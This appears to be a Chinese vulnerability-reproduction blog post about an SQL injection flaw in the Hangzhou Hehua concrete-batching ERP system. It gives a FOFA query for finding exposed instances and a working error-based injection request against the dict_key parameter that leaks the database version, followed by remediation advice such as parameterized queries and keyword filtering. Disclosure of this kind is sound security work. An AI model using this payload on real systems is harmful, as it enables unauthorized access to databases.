当前位置: 首页 > article >正文

商混ERP系统 SQL注入漏洞复现

0x01 产品简介

   杭州荷花软件有限公司开发的商混ERP系统。这套系统主要是处理建筑公司或者各项工程的搅拌站管理,内部含有销售模块、生产管理模块、实验室模块、人员管理等

0x02 漏洞概述

 商混ERP系统/Sys/DictionaryEdit.aspx处dict_key参数存在SQL报错注入漏洞,未授权的攻击者可通过该漏洞获取数据库权限。

0x03 复现环境

FOFA:app="商混ERP系统"

0x04 漏洞复现

PoC

GET /Sys/DictionaryEdit.aspx?dict_key=1%27%20and%201=convert(varchar(255),@@version)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

查询数据库版本

0x05 修复建议

使用预编译语句,所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。

对进入数据库的特殊字符('"@&*;等)进行转义处理,或编码转换。

确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。

过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。


http://www.kler.cn/a/153869.html

相关文章:

  • go-zero(一) 介绍和使用
  • 量化交易系统开发-实时行情自动化交易-4.1.3.A股平均趋向指数(ADX)实现
  • 面向服务的软件工程——业务流程合规性(Business Process Compliance)(week12)
  • python+Django+MySQL+echarts+bootstrap制作的教学质量评价系统,包括学生、老师、管理员三种角色
  • c++数字雨实现
  • RK3568平台开发系列讲解(platform虚拟总线驱动篇)实验:点亮一个LED
  • css设计文本样式 前端开发入门笔记(十二)
  • DAPP开发【02】Remix使用
  • pytorch中Conv1d、Conv2d与Conv3d详解
  • arcgis投影栅格不可用
  • 2023-简单点-机器学习中的数值计算问题
  • docker中的网络不通问题
  • jOOQ所应用的场合,使用价值以及开发本框架的原因
  • vue v-permission权限指令
  • 【滑动窗口】将X减到0的最小操作数
  • .[[backup@waifu.club]].wis勒索病毒数据怎么处理|数据解密恢复
  • Performance性能检测
  • Unity3d 灯光阴影开启,法线贴图出现BUG
  • 单片机学习1——点亮一个LED灯
  • 如何基于gensim和Sklearn实现文本矢量化
  • Linux系统---环境变量+内核进程调度队列(选学)
  • 使用 kubeadm 部署 Kubernetes 集群(二)k8s环境安装
  • 小白备战蓝桥杯:Java基础语法
  • eclipse Unsupported Content Type
  • react之ReactRouter的使用
  • Jayway JsonPath-提取JSON文档内容的Java DSL | 京东物流技术团队